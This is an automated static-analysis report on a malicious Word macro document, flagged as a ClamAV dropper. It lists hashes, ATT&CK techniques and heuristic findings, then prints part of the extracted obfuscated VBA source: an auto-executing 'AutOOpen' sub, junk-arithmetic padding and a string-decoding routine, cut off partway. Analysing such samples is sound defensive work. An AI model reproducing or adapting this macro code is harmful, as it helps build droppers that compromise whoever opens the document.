Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5e7a1ed5f9a1fbc9…

MALICIOUS

Office (OLE)

69.0 KB Created: 2018-06-11 10:40:00 Authoring application: Microsoft Office Word First seen: 2019-01-25
MD5: 09794329ffa605c623b941cd0e3ed0ee SHA-1: 848d26d600987315e483d46f506ab1ce501f537e SHA-256: 5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
282 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The document body and heuristics indicate a lure to enable macros, a common tactic for malware droppers. The VBA macro 'AutOOpen' is present and configured to execute upon opening, likely to download and execute a second-stage payload. The presence of 'CreateObject' and 'CallByName' calls within the macro further suggests malicious intent.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6581558-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6581558-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9312 bytes
SHA-256: c3f100af113f914a265279db3855c6f2c8e96a8d5d075b72d08f7b942347cb64
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
domino1964
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
End Sub


Attribute VB_Name = "ACCEPTED"
Function accessruy()
accessruy = nake3344
End Function

Function nake3344()
nake3344 = guest1974(xytroftu.buggerme)
End Function

Function crack_serial()
crack_serial = xytroftu.waswas
End Function

Function luctynbu()
luctynbu = gogoose1.xaza1111
End Function

Function chicojosie(cleissin, wambapvo)
linksenior = Left(cleissin, wambapvo)
chicojosie = legendagp(linksenior)
End Function

Function legendagp(plankpin)
legendagp = Right(plankpin, 1)
End Function

Function portroas()
portroas = "/usgc;]x]/lEmaQR/aE.]/"
End Function


Attribute VB_Name = "aveidlegiB"
Function nymphroa(servroor As String, NZIsxFonq As Integer) As String
Dim Gjyznysq As Integer
Gjyznysq = 0
suzuki100 = 17 + 43
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
For botanistbotanist = 1 To 90
If (chicojosie(ninvaude, botanistbotanist) = servroor) Then
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
   Gjyznysq = botanistbotanist
    Exit For
End If
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
Next botanistbotanist
Gjyznysq = IIf(Gjyznysq - NZIsxFonq <= 0, 90 + Gjyznysq - NZIsxFonq, Gjyznysq - NZIsxFonq)
nymphroa = chicojosie(ninvaude, Gjyznysq)
End Function

Function liophia5()
liophia5 = pedanaeb.AVEEKERUHC
End Function

Function mygodfen(vonabloT, AVONUBED, cfmrnb69, jaxmeoff)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
gogoose1.tralcodg = lawstorm(vonabloT, AVONUBED) + cassie169(vonabloT, cfmrnb69) + anesabya(jaxmeoff)
End Function

Sub domino1964()
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
pedanaeb.vanomerd = "ourlomeb"
End Sub


Attribute VB_Name = "Flawacid"
Function sublessee(mrjrb827, fooldelta)
sublessee = ationdri(Int((mrjrb827 * churedro()) + fooldelta))
End Function

Function ationdri(anyzrata)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
ationdri = CInt(anyzrata)
End Function

Function lawstorm(chenabcd, ajaxdude)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
lawstorm = guest1974(gogoose1.cancerfrog) + chenabcd + guest1974(tiggerisp.kinsscri) + _
 ajaxdude + guest1974(gogoose1.gogueacr + gogoose1.signtist) + ajaxdude
End Function

Function anesabya(attilapat)
suzuki100 = 17 + 43
suzuki100 = suzuki100 - 87 - 33 + suzuki10
suzuki100 = 57 * 56 + suzuki100 + suzuki10
suzuki100 = 49 * 83 - 77
suzuki100 = 64 - 20 - 63 + suzuki100 + 2
suzuki100 = 12 * 28
anesabya = guest1974(portroas + xytroftu.BBCFKUJC) + attilapat + _
guest1974(xytroftu.AVOKNELOBE) + attilapat + guest1974(pedanaeb.moczeegi)
End Function

Function ninvaude()
ninvaude = pedanaeb.ruxcontrol
End Function


Attribute VB_Name = "gogoos
... (truncated)